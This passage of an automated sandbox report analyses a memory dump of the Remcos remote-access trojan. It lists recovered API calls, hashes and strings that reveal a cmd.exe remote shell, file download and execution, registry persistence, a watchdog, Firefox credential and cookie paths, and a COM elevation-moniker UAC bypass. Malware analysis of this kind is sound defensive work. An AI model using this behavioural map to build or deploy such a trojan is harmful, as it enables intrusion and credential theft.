                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,2913C1D7,29196C58), ref: 29143551
                                                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,2913C1D7,29196C58), ref: 29143565
                                                                        • RegCloseKey.KERNEL32(?,?,?,2913C1D7,29196C58), ref: 29143570
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3677997916-0
                                                                        • Opcode ID: 95e417f46469a47d222b080fcc63a8f8f786a9b650677c92def8c3a3feaeb3c4
                                                                        • Instruction ID: 069e27620f72aa3803624d7352cf5a87054bc4b466a54e78f76339e35ca24a59
                                                                        • Opcode Fuzzy Hash: 95e417f46469a47d222b080fcc63a8f8f786a9b650677c92def8c3a3feaeb3c4
                                                                        • Instruction Fuzzy Hash: D7E06D32D12238BBEB215AA3ED0DDEB7FACEF0A7A4B010145BD08A6101D2254F10E6E0

                                                                        Control-flow Graph (graph image not preserved; blocks: 1293 291438b2-291438c8 RegCreateKeyA; 1294 291438f4; 1295 291438ca-291438f2 RegSetValueExA, RegCloseKey; 1296 291438f6-291438f9; edges: 1293->1294, 1293->1295, 1294->1296, 1295->1296)
                                                                        APIs
                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,291960B4), ref: 291438C0
                                                                        • RegSetValueExA.KERNEL32(291960B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,2913C18D,29196C58,00000001,000000AF,291960B4), ref: 291438DB
                                                                        • RegCloseKey.ADVAPI32(291960B4,?,?,?,2913C18D,29196C58,00000001,000000AF,291960B4), ref: 291438E6
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCreateValue
                                                                        • String ID:
                                                                        • API String ID: 1818849710-0
                                                                        • Opcode ID: e929e7c6c6375fc3d2cb705e5d5f2334f00bb79146cae1f58e0a165cf39bd519
                                                                        • Instruction ID: b6979761f6181650b8169cb865c79ebb2cf4a595d60a306dd0d7a7230282e6ca
                                                                        • Opcode Fuzzy Hash: e929e7c6c6375fc3d2cb705e5d5f2334f00bb79146cae1f58e0a165cf39bd519
                                                                        • Instruction Fuzzy Hash: 15E03072A00218BBEB109E92DD0AFDA7B6CEF08754F104155BF0496140D6354A14A791
                                                                        APIs
                                                                        • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,291A4EF8,291A4EF8), ref: 2914CB9A
                                                                        • LocalFree.KERNEL32(?,?), ref: 2914CBC0
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FormatFreeLocalMessage
                                                                        • String ID:
                                                                        • API String ID: 1427518018-0
                                                                        • Opcode ID: 367806a9a8c431e8e517ed96e91310395a03059299f1c9eeb21ebbe2a2367c4e
                                                                        • Instruction ID: 292ef087a494752b61a54904f0cc1a8012eabff86b62eb0475b70bc41b70fffb
                                                                        • Opcode Fuzzy Hash: 367806a9a8c431e8e517ed96e91310395a03059299f1c9eeb21ebbe2a2367c4e
                                                                        • Instruction Fuzzy Hash: 77F0C830F0014DBBDF18ABA7DC49CFE773CDB94358B50806AB516A2194EE605F0BD665
                                                                        APIs
                                                                        • socket.WS2_32(?,00000001,00000006), ref: 29134852
                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,2913530B,?,?,00000000,00000000,?,?,00000000,29135208,?,00000000), ref: 2913488E
                                                                          • Part of subcall function 2913489E: WSAStartup.WS2_32(00000202,00000000), ref: 291348B3
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateEventStartupsocket
                                                                        • String ID:
                                                                        • API String ID: 1953588214-0
                                                                        • Opcode ID: ec5aa054b2fad68ee3e0641764703ad6df0681f266dad8a15b5a81e6ef1d66fb
                                                                        • Instruction ID: fbe0a2e5ae52ab5737bf989886fc0b390c4f226991071b6ceb138713ec3a6a67
                                                                        • Opcode Fuzzy Hash: ec5aa054b2fad68ee3e0641764703ad6df0681f266dad8a15b5a81e6ef1d66fb
                                                                        • Instruction Fuzzy Hash: C4019A71808BC09EE7399F2AA44A6867FE1AB05304F044E9EF0CA93B91C3B4A442CB14
                                                                        APIs
                                                                        • getaddrinfo.WS2_32(00000000,00000000,00000000,291A2ADC,291A50E4,00000000,291451C3,00000000,00000001), ref: 29144F46
                                                                        • WSASetLastError.WS2_32(00000000), ref: 29144F4B
                                                                          • Part of subcall function 29144DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 29144E10
                                                                          • Part of subcall function 29144DC1: LoadLibraryA.KERNEL32(?), ref: 29144E52
                                                                          • Part of subcall function 29144DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 29144E72
                                                                          • Part of subcall function 29144DC1: FreeLibrary.KERNEL32(00000000), ref: 29144E79
                                                                          • Part of subcall function 29144DC1: LoadLibraryA.KERNEL32(?), ref: 29144EB1
                                                                          • Part of subcall function 29144DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 29144EC3
                                                                          • Part of subcall function 29144DC1: FreeLibrary.KERNEL32(00000000), ref: 29144ECA
                                                                          • Part of subcall function 29144DC1: GetProcAddress.KERNEL32(00000000,?), ref: 29144ED9
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                        • String ID:
                                                                        • API String ID: 1170566393-0
                                                                        • Opcode ID: f990d79d69a96f992defa329c7cf2869c4930b343cc9588a5a5c0f883e890fc9
                                                                        • Instruction ID: 9cf5ec890758cfd6c8ffc7890f810523de85c053fe21cfa3a7330c7d06bccc02
                                                                        • Opcode Fuzzy Hash: f990d79d69a96f992defa329c7cf2869c4930b343cc9588a5a5c0f883e890fc9
                                                                        • Instruction Fuzzy Hash: 55D05B327004216FE354765F9C45FAF99DDDF99764B110027F914D3645D6548D4287A0
                                                                        APIs
                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,2913EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,291960CC,00000003,00000000), ref: 2913D0B3
                                                                        • GetLastError.KERNEL32 ref: 2913D0BE
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateErrorLastMutex
                                                                        • String ID:
                                                                        • API String ID: 1925916568-0
                                                                        • Opcode ID: c4bd332a38b444af79dc3e294d1653aefd63e543a2bcf596cc937c4ac960c757
                                                                        • Instruction ID: 6cb8ca36e6dc94c2219bdc6d0de03861b52adf0fef207b7f43f0ccf2322f2e09
                                                                        • Opcode Fuzzy Hash: c4bd332a38b444af79dc3e294d1653aefd63e543a2bcf596cc937c4ac960c757
                                                                        • Instruction Fuzzy Hash: 26D02270708200ABFB0C3732DC4C75C3C6AAB50301F400418B007C44C0CA784880DA00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _wcslen
                                                                        • String ID:
                                                                        • API String ID: 176396367-0
                                                                        • Opcode ID: 5ba988ecaaf0601099ff7d4843746d1594aca23db71213ab37f1d2183b03357c
                                                                        • Instruction ID: af97a94d7f0960eb2c48bf83ec19b78115a7dceb3510c1dc991d71c901dbf30f
                                                                        • Opcode Fuzzy Hash: 5ba988ecaaf0601099ff7d4843746d1594aca23db71213ab37f1d2183b03357c
                                                                        • Instruction Fuzzy Hash: 0311BB31904248AFDB45DF26DC509EF77F9AF74214B90902DE80253294EF34AF16CB94
                                                                        APIs
                                                                        • WSAStartup.WS2_32(00000202,00000000), ref: 291348B3
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Startup
                                                                        • String ID:
                                                                        • API String ID: 724789610-0
                                                                        • Opcode ID: cae01116dd0a42f83e3dd13382dee625817c707f89f3074ab48df8d7f1709981
                                                                        • Instruction ID: 568fb992f29eed380ebdf8bafcd5ce241fcb6d91e9609f67b375a035517d3bd9
                                                                        • Opcode Fuzzy Hash: cae01116dd0a42f83e3dd13382dee625817c707f89f3074ab48df8d7f1709981
                                                                        • Instruction Fuzzy Hash: B2D0223365824C4EE620B9B5AC0F8A4771CC306611F000BAA6CB183AC6E6041B1CC2A3
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: send
                                                                        • String ID:
                                                                        • API String ID: 2809346765-0
                                                                        • Opcode ID: 54f069a2729d2ba8448d539ef566664b0b48a64da194b9a47cf55ea5e4031607
                                                                        • Instruction ID: 6f48491f7eed92824bbf27587f3f7d5341e2e00131adabf7eb64f471bfcfe522
                                                                        • Opcode Fuzzy Hash: 54f069a2729d2ba8448d539ef566664b0b48a64da194b9a47cf55ea5e4031607
                                                                        • Instruction Fuzzy Hash: 30B09B75104245FF96051761C804C5E7D75B7C8380F014D0C718641130C53584505721
                                                                        APIs
                                                                        • SetEvent.KERNEL32(?,?), ref: 29137CF4
                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 29137DC2
                                                                        • DeleteFileW.KERNEL32(00000000), ref: 29137DE4
                                                                          • Part of subcall function 2914C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C37D
                                                                          • Part of subcall function 2914C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C3AD
                                                                          • Part of subcall function 2914C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C402
                                                                          • Part of subcall function 2914C322: FindClose.KERNEL32(00000000,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C463
                                                                          • Part of subcall function 2914C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,291A52D8,291A52F0,00000001), ref: 2914C46A
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                          • Part of subcall function 2914B580: GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                          • Part of subcall function 29134AA1: WaitForSingleObject.KERNEL32(?,00000000,2913547D,?,?,00000004,?,?,00000004,?,291A4EF8,?), ref: 29134B47
                                                                          • Part of subcall function 29134AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,291A4EF8,?,?,?,?,?,?,2913547D), ref: 29134B75
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 291381D2
                                                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 291382B3
                                                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 291384FF
                                                                        • DeleteFileA.KERNEL32(?), ref: 2913868D
                                                                          • Part of subcall function 29138847: __EH_prolog.LIBCMT ref: 2913884C
                                                                          • Part of subcall function 29138847: FindFirstFileW.KERNEL32(00000000,?,29196618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29138905
                                                                          • Part of subcall function 29138847: __CxxThrowException@8.LIBVCRUNTIME ref: 2913892D
                                                                          • Part of subcall function 29138847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 2913893A
                                                                        • Sleep.KERNEL32(000007D0), ref: 29138733
                                                                        • StrToIntA.SHLWAPI(00000000,00000000), ref: 29138775
                                                                          • Part of subcall function 2914CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 2914CB68
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                        • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                                        • API String ID: 1067849700-1507758755
                                                                        • Opcode ID: 3a6bb3374aeebc9350010c82bac2868d07df0cfb9caaf137653ec49f540be6b8
                                                                        • Instruction ID: e84956a34b3cc2eaccd1171f7aabfb46db723152da006af1d8074059012112e5
                                                                        • Opcode Fuzzy Hash: 3a6bb3374aeebc9350010c82bac2868d07df0cfb9caaf137653ec49f540be6b8
                                                                        • Instruction Fuzzy Hash: C342B331A143407BD788FB77CC559AE76B96FB1248FC0AD2CE04257194EE249B0BC79A
                                                                        APIs
                                                                        • __Init_thread_footer.LIBCMT ref: 291356E6
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                        • __Init_thread_footer.LIBCMT ref: 29135723
                                                                        • CreatePipe.KERNEL32(291A6CCC,291A6CB4,291A6BD8,00000000,291960CC,00000000), ref: 291357B6
                                                                        • CreatePipe.KERNEL32(291A6CB8,291A6CD4,291A6BD8,00000000), ref: 291357CC
                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,291A6BE8,291A6CBC), ref: 2913583F
                                                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 29135897
                                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 291358BC
                                                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 291358E9
                                                                          • Part of subcall function 29164801: __onexit.LIBCMT ref: 29164807
                                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,291A4F90,291960D0,00000062,291960B4), ref: 291359E4
                                                                        • Sleep.KERNEL32(00000064,00000062,291960B4), ref: 291359FE
                                                                        • TerminateProcess.KERNEL32(00000000), ref: 29135A17
                                                                        • CloseHandle.KERNEL32 ref: 29135A23
                                                                        • CloseHandle.KERNEL32 ref: 29135A2B
                                                                        • CloseHandle.KERNEL32 ref: 29135A3D
                                                                        • CloseHandle.KERNEL32 ref: 29135A45
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                        • String ID: SystemDrive$cmd.exe
                                                                        • API String ID: 2994406822-3633465311
                                                                        • Opcode ID: fe32a422220c7f8f0498a77ea8adcf449fefbc31877cf547447cfffcfdc50c75
                                                                        • Instruction ID: 5abe2427ebc783a51e86e0cc7026c4f8c42037fb931784b49c10b544d807d9cd
                                                                        • Opcode Fuzzy Hash: fe32a422220c7f8f0498a77ea8adcf449fefbc31877cf547447cfffcfdc50c75
                                                                        • Instruction Fuzzy Hash: A0910A71704288BFD748BF37DC8091A3B79EB6068CB805419F4199629DDE3A9F0BC765
                                                                        APIs
                                                                        • GetCurrentProcessId.KERNEL32 ref: 29142141
                                                                          • Part of subcall function 291438B2: RegCreateKeyA.ADVAPI32(80000001,00000000,291960B4), ref: 291438C0
                                                                          • Part of subcall function 291438B2: RegSetValueExA.KERNEL32(291960B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,2913C18D,29196C58,00000001,000000AF,291960B4), ref: 291438DB
                                                                          • Part of subcall function 291438B2: RegCloseKey.ADVAPI32(291960B4,?,?,?,2913C18D,29196C58,00000001,000000AF,291960B4), ref: 291438E6
                                                                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 29142181
                                                                        • CloseHandle.KERNEL32(00000000), ref: 29142190
                                                                        • CreateThread.KERNEL32(00000000,00000000,29142829,00000000,00000000,00000000), ref: 291421E6
                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 29142455
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                        • API String ID: 3018269243-13974260
                                                                        • Opcode ID: 7e99520b2658a08672d6be1cb83fdfa4dc32d26b0cbe1e0b0f51666ee471f73a
                                                                        • Instruction ID: fb3e481767398c9f678766d9da742ee0818dbe7888844b58b9002dba841fdc2f
                                                                        • Opcode Fuzzy Hash: 7e99520b2658a08672d6be1cb83fdfa4dc32d26b0cbe1e0b0f51666ee471f73a
                                                                        • Instruction Fuzzy Hash: A371D631A1424077E258F773DC55CAEB7B8AFB520CFC0A92DE44652094EF24AB0BC696
                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 2913BBEA
                                                                        • FindClose.KERNEL32(00000000), ref: 2913BC04
                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 2913BD27
                                                                        • FindClose.KERNEL32(00000000), ref: 2913BD4D
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFile$FirstNext
                                                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                        • API String ID: 1164774033-3681987949
                                                                        • Opcode ID: 07f0d8fcba3d6c51da3c50f18f4f73b4ad83dd0ae1b1c421260645f3e5a0d98f
                                                                        • Instruction ID: 9ecbea369d83152acb7c6c1e5cbd1670c33d228b285a1f2db7b719fefb1ad27e
                                                                        • Opcode Fuzzy Hash: 07f0d8fcba3d6c51da3c50f18f4f73b4ad83dd0ae1b1c421260645f3e5a0d98f
                                                                        • Instruction Fuzzy Hash: 76517331D10049ABEB48FBB3DC58DEDB738AF20248FD09559E506660A4FF346B4BCA59
                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 2913BDEA
                                                                        • FindClose.KERNEL32(00000000), ref: 2913BE04
                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 2913BEC4
                                                                        • FindClose.KERNEL32(00000000), ref: 2913BEEA
                                                                        • FindClose.KERNEL32(00000000), ref: 2913BF0B
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: Find$Close$File$FirstNext
                                                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                        • API String ID: 3527384056-432212279
                                                                        • Opcode ID: 7afe6482fc09dacc7a1404a9f5d16accd06b66b7c69e6aa2c9810d53359fb1cc
                                                                        • Instruction ID: 1f3bf61e27be1823ce885b0fc8394735a47f8e65f38b8db915ab682e6c6d6a63
                                                                        • Opcode Fuzzy Hash: 7afe6482fc09dacc7a1404a9f5d16accd06b66b7c69e6aa2c9810d53359fb1cc
                                                                        • Instruction Fuzzy Hash: 5141B631D04119BAEB88F7B7DC59CED777CAF20258FC09119E50652094FF206B4BCAA5
                                                                        APIs
                                                                        • OpenClipboard.USER32 ref: 291468FD
                                                                        • EmptyClipboard.USER32 ref: 2914690B
                                                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 2914692B
                                                                        • GlobalLock.KERNEL32(00000000), ref: 29146934
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 2914696A
                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 29146973
                                                                        • CloseClipboard.USER32 ref: 29146990
                                                                        • OpenClipboard.USER32 ref: 29146997
                                                                        • GetClipboardData.USER32(0000000D), ref: 291469A7
                                                                        • GlobalLock.KERNEL32(00000000), ref: 291469B0
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 291469B9
                                                                        • CloseClipboard.USER32 ref: 291469BF
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                        • String ID:
                                                                        • API String ID: 3520204547-0
                                                                        • Opcode ID: 2bab923c9eb6cc7ef209c09bcac3b81349bc55c85273124854f977ab56342299
                                                                        • Instruction ID: a98a5c0407032378288b18b35e3997a43e8419b39cea8aed405bf78a62560872
                                                                        • Opcode Fuzzy Hash: 2bab923c9eb6cc7ef209c09bcac3b81349bc55c85273124854f977ab56342299
                                                                        • Instruction Fuzzy Hash: FB2171717042406FE754BBB3DC4CAAE77B8BFA4755F40581CE90782184EE384A069762
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$1$2$3$4$5$6$7
                                                                        • API String ID: 0-3177665633
                                                                        • Opcode ID: 4385d13386e6049ed1ccb4f940037de06280f89496179afb68bd5ef5f3174dec
                                                                        • Instruction ID: 70d04f82f6c7a7ffde7ac6108dbd6f6706e35e716ca782d889b78e476eda031a
                                                                        • Opcode Fuzzy Hash: 4385d13386e6049ed1ccb4f940037de06280f89496179afb68bd5ef5f3174dec
                                                                        • Instruction Fuzzy Hash: F771E770908301AFD704CF22DC51F9A7BE4AFA8B54F40A90DF59A571D0DA74AB0AC793
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 2913755C
                                                                        • CoGetObject.OLE32(?,00000024,29196528,00000000), ref: 291375BD
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: Object_wcslen
                                                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                        • API String ID: 240030777-3166923314
                                                                        • Opcode ID: 323a4dab028dd0410cd145bd1158239f55abe88033906c0d92155119edd851ee
                                                                        • Instruction ID: 7e0e51cff4a1b5f40e90fcab6ef13bb9467eb2d017b56927ba4a9c0ec06b7308
                                                                        • Opcode Fuzzy Hash: 323a4dab028dd0410cd145bd1158239f55abe88033906c0d92155119edd851ee
                                                                        • Instruction Fuzzy Hash: 8111867291115CBBE710DAA6CD88EDEB7BCAF14758F810055F508A2244DA349B068A75
                                                                        APIs
                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,291A58E8), ref: 2914A7EF
                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 2914A83E
                                                                        • GetLastError.KERNEL32 ref: 2914A84C
                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 2914A884
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                        • String ID:
                                                                        • API String ID: 3587775597-0
                                                                        • Opcode ID: f6ff3758876c47198e2b9be6942116826a1a5ae3d7f844e18121c9949751836a
                                                                        • Instruction ID: 81ceefe5c4dce7ba81833a6619d1fb70e0d57c2fe1b30e187c02d448de746415
                                                                        • Opcode Fuzzy Hash: f6ff3758876c47198e2b9be6942116826a1a5ae3d7f844e18121c9949751836a
                                                                        • Instruction Fuzzy Hash: 5D815271508304ABE344DB62DC9499FB7BCBFA4348F90981DF58652190EF30EB0ACB96
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,2914A517,00000000), ref: 2914ABAD
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,2914A517,00000000), ref: 2914ABC4
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A517,00000000), ref: 2914ABD1
                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,2914A517,00000000), ref: 2914ABE0
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A517,00000000), ref: 2914ABF1
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A517,00000000), ref: 2914ABF4
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                        • String ID:
                                                                        • API String ID: 221034970-0
                                                                        • Opcode ID: b2afb5d893718d9cc5df171b6ccbc2d75dc01c47347c0ef20f71c21025fde7e5
                                                                        • Instruction ID: 07e6cc12dcd1368cbac291e2fd815d2d5e329dba32ab572bbbcd549859a210dd
                                                                        • Opcode Fuzzy Hash: b2afb5d893718d9cc5df171b6ccbc2d75dc01c47347c0ef20f71c21025fde7e5
                                                                        • Instruction Fuzzy Hash: F011C272E5011C7BE311AB66DC89CFF3B7CEB463A5B400016F90692080DB284A46BAA1
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 2913C3D6
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 2913C4A9
                                                                        • FindClose.KERNEL32(00000000), ref: 2913C4B8
                                                                        • FindClose.KERNEL32(00000000), ref: 2913C4E3
                                                                        Memory Dump Source
